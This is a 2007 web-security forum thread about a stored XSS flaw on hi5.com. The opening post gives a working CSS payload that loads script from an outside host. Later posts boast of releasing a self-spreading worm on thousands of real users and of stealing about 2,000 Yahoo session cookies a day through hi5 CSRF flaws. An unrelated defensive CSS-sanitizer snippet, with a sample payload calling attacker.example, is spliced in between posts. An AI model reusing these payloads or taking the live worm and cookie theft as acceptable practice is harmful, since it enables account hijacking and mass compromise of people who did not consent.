sla.ckers.org web application security lab forums
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
hi5.com xss
Posted by: sirdarckcat (IP Logged)
Date: December 23, 2007 12:53AM

[www.hi5.com]

style:

<style type='text/css'>strong{
-moz-binding:url(" [ha.ckers.org]");
}

strong{
background:url("javascript:void(document.body.appendChild(document.createElement('script')).src=' [h4k.in]');");
}
</style>

Greetz!!

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 1 time(s). Last edit at 12/23/2007 01:10AM by sirdarckcat.
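
The payload above works through two CSS primitives: the Mozilla-only -moz-binding property (which pulls an XBL file from a remote origin) and a url() value with a javascript: scheme. As an added example that is not part of the thread or of hi5's code, here is a server-side check a site that accepts user-supplied CSS could run before storing it; the function names, the trusted-origin allow list and the sample stylesheet are all constructed for this example.

```javascript
// Constructed allow list: url() targets outside these origins are reported.
const TRUSTED_ORIGINS = ["https://www.example.com"];

// Normalise CSS so trivial obfuscation (comments, CSS hex escapes like \6A,
// single-character escapes, line breaks, mixed case) cannot hide a token.
function normalizeCss(css) {
  let s = css.replace(/\/\*[\s\S]*?\*\//g, "");            // strip /* comments */
  s = s.replace(/\\([0-9a-fA-F]{1,6})\s?/g, (_, hex) =>    // \53 -> "S"
    String.fromCodePoint(parseInt(hex, 16)));
  s = s.replace(/\\(.)/g, "$1");                            // \a -> "a"
  return s.replace(/\s+/g, " ").toLowerCase();
}

// Returns a list of findings; an empty list means nothing dangerous was seen.
function findDangerousCss(css) {
  const findings = [];
  const s = normalizeCss(css);
  if (/-moz-binding\s*:/.test(s)) findings.push("moz-binding");
  const urlRe = /url\(\s*(['"]?)(.*?)\1\s*\)/g;
  let m;
  while ((m = urlRe.exec(s)) !== null) {
    const target = m[2].replace(/\s+/g, "");  // the scheme may be split by whitespace
    if (/^javascript:/.test(target)) { findings.push("javascript-url"); continue; }
    if (/^(https?:)?\/\//.test(target)) {     // absolute or protocol-relative URL
      let origin = null;
      try { origin = new URL(target, "https://www.example.com").origin; } catch (e) {}
      if (!origin || !TRUSTED_ORIGINS.includes(origin)) {
        findings.push("external-url:" + (origin || target));
      }
    }
  }
  return findings;
}

// Constructed sample with the same shape as the stylesheet in the post above
// (hostnames are placeholders, not the real ones).
const SAMPLE = `strong{-moz-binding:url("http://attacker.example/x.xml");}
strong{background:url("javascript:void(document.body.appendChild(document.createElement('script')).src='http://attacker.example/i.js');");}`;

console.log(findDangerousCss(SAMPLE));
```

A sanitizer that rejects on any finding would have stopped both rules in the original payload; the escape decoding is what keeps a `\6A avascript:` variant from slipping past.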

Re: hi5.com xss
Posted by: klaus (IP Logged)
Date: December 23, 2007 09:39PM

wow. xss worm hitting hi5 in less than 24h...

btw, what is i.js doing?

Re: hi5.com xss
Posted by: sirdarckcat (IP Logged)
Date: December 23, 2007 10:47PM

i.js is nothing.. that's the XSS test case from .mario :P

the worm is going very slow, since it's programmed just for firefox.. since I'm lazy and I don't wanna find out why it's not working on IE

Greetz!!

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

Re: hi5.com xss
Posted by: nemessis (IP Logged)
Date: December 24, 2007 07:06PM

They have known about those issues for a long time. It is not a secret that hi5 has CSRF vulns in at least 4 places on the user profile pages. If you search around, you will find some hijacked or specially made accounts used to steal users' passwords or cookies from other web services (Yahoo, Hotmail etc.). We tested hi5 to find all the CSRF vulns and the results are:
- on the main page of the profile: CSRF affecting IE6, Firefox and Safari for Windows
- on another profile page (shhht): CSRF affecting IE6, IE7, Firefox, Safari for Windows and Opera
- in the comment box there are 2 CSRF vulns, but I was too lazy to find out how they work and which browsers are affected. But a friend of mine is using that shit to steal "beautiful babes" accounts :)

Hi5 XSS worms have been around for a long time. You can find fully working worm sources on Spanish and Turkish hacking websites.

Anyway, nice find sirdarckcat. I was glad 1 month ago when I discovered those XSS's for the first time, but when I googled it the results were very disappointing for me. Hi5 has been vulnerable for a very long time and those issues have been publicly disclosed by security/hacking teams for at least 6 months.



Edited 1 time(s). Last edit at 12/24/2007 07:08PM by nemessis.

Re: hi5.com xss
Posted by: sirdarckcat (IP Logged)
Date: December 24, 2007 07:38PM

[www.hi5.com]

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 2 time(s). Last edit at 12/24/2007 08:41PM by sirdarckcat.

Re: hi5.com xss
Posted by: sirdarckcat (IP Logged)
Date: December 25, 2007 05:04AM

btw if you use NoScript or Firefox 3, the exploit won't work.

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

Re: hi5.com xss
Posted by: nemessis (IP Logged)
Date: December 25, 2007 07:24AM

Do you have a method to find the results? I'm curious about the spreading speed.

My results in 10 hours (this was my first attempt and I attacked Yahoo accounts, not hi5 accounts, but I used the same hi5 vuln to do that - just the IE6 browser was affected in this attempt) [rapidshare.com]

With IE6 + Firefox affected & a grabber that doesn't display empty/incomplete cookies, I've got 2K of GOOD Yahoo cookies/day. So there is a big impact if someone uses a social network like hi5 for personal data stealing.

[www.rstcenter.com] - Romanian Security Team
Limousine rentals



Edited 1 time(s). Last edit at 12/25/2007 08:03AM by nemessis.

Re: hi5.com xss
Posted by: klaus (IP Logged)
Date: December 25, 2007 08:03AM

Nemessis, ten users so far. Seems like hi5 users are not Firefox fans.

Re: hi5.com xss
Posted by: nemessis (IP Logged)
Date: December 25, 2007 08:05AM

Yes indeed. Most of them are IE6/IE7 users.

[www.rstcenter.com] - Romanian Security Team
Limousine rentals

Re: hi5.com xss
Posted by: sirdarckcat (IP Logged)
Date: December 25, 2007 12:20PM

this works for IE6/7 but after exploitation it shows an error, anyway.. after exploitation..

Take into consideration it was Christmas Eve, no one is at hi5 at Christmas..

Anyway, I receive a friend request for each infected victim so.. so far, 15, of which 13 are real.. if this is really exponential, tomorrow I should have like 3k friends, and 40k after that.. etc..

Greetz!!

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

Re: hi5.com xss
Posted by: nemessis (IP Logged)
Date: December 25, 2007 01:08PM

Nice. We didn't succeed in making a working exploit for IE7 on the main page of the profile.

[www.rstcenter.com] - Romanian Security Team
Limousine rentals

Re: hi5.com xss
Posted by: sirdarckcat (IP Logged)
Date: December 25, 2007 11:19PM

there are now 82 infected.
7 are not infected, but sent the friend request, I dunno why.. maybe they use Opera/Safari/NoScript..

Greetz!!

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

Re: hi5.com xss
Posted by: sirdarckcat (IP Logged)
Date: December 26, 2007 12:02PM

A chart.. hey it is exponential.. anyway, it looks quadratic to me..

http://tinyurl.com/2vrqof

with help of thornmaker, and a very cool applet, it appears that the growth of the worm follows:

4.07271957142175*(1.049393949541566)^time

http://img168.imageshack.us/img168/4787/likethisxu6.jpg

I'm thinking that the following worms should have google analytics..

For the record..

Account created:
hi5 <info@hi5.com> Welcome to hi5! Mon, 24 Dec 2007 16:26:00 -0700

The worm was on like.. 10 minutes after that.

I searched for random persons and sent them friend requests.. so they check my profile.

The first victim:

"info@hi5.com" <info@hi5.com> v4k3 Lozano has accepted your Friend Request Mon, 24 Dec 2007 18:39:52 -0700

It's a shame she deleted the account:

[hi5.com]

She deleted the account.. on Wed, 26 Dec 2007 13:17:40 -0700

At 2:37 GMT-6 on Wednesday the 26th.. the script that added friends was slower than the users sending friend requests.

On Wednesday, spamcero.com staff sent an e-mail asking me to stop the e-mails.. so I changed the registration mail.

and well, no word from hi5.com staff.. yet

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 12 time(s). Last edit at 12/26/2007 03:07PM by sirdarckcat.

Re: hi5.com xss
Posted by: klaus (IP Logged)
Date: December 26, 2007 03:31PM

This thing is going to reach "Singularity" in less than 24h!

Re: hi5.com xss
Posted by: klaus (IP Logged)
Date: December 26, 2007 07:09PM

Over 3000 added now. Fascinating to see it spreading.

Re: hi5.com xss
Posted by: klaus (IP Logged)
Date: December 26, 2007 08:48PM

5000 friends. Over and out. Santa removed.

Re: hi5.com xss
Posted by: sirdarckcat (IP Logged)
Date: December 27, 2007 12:47AM

actually the account was still there, I was still able to add friends, it reached 5,800, and then I was banned.

it was cool :P, the next worm should have google analytics, it would make the things much easier to track :P..

Greetz!!

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]

Re: hi5.com xss
Posted by: sirdarckcat (IP Logged)
Date: December 27, 2007 08:30PM

This is the last chart I was able to get:

http://tinyurl.com/ynnq2z

You can clearly see where I was no longer able to accept new friends.. they were arriving too fast


anyway, that stops on 1037 friends, the total was 5800, but I'm not able to get the other data since.. well.. the e-mail server collapsed.

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 1 time(s). Last edit at 12/27/2007 08:31PM by sirdarckcat.

Re: hi5.com xss
Posted by: sirdarckcat (IP Logged)
Date: December 29, 2007 01:13PM

I checked the e-mail again today; this is the last chart:

http://tinyurl.com/33yvrs

amazing.. even though it's not spreading anymore, all those persons added "Santa" as a friend.

And here's all the love the affected users sent to santa:

[www.hi5.com]

--------------------------------
[sirdarckcat.blogspot.com] [www.sirdarckcat.net] [foro.elhacker.net] [twitter.com]



Edited 1 time(s). Last edit at 12/29/2007 01:16PM by sirdarckcat.
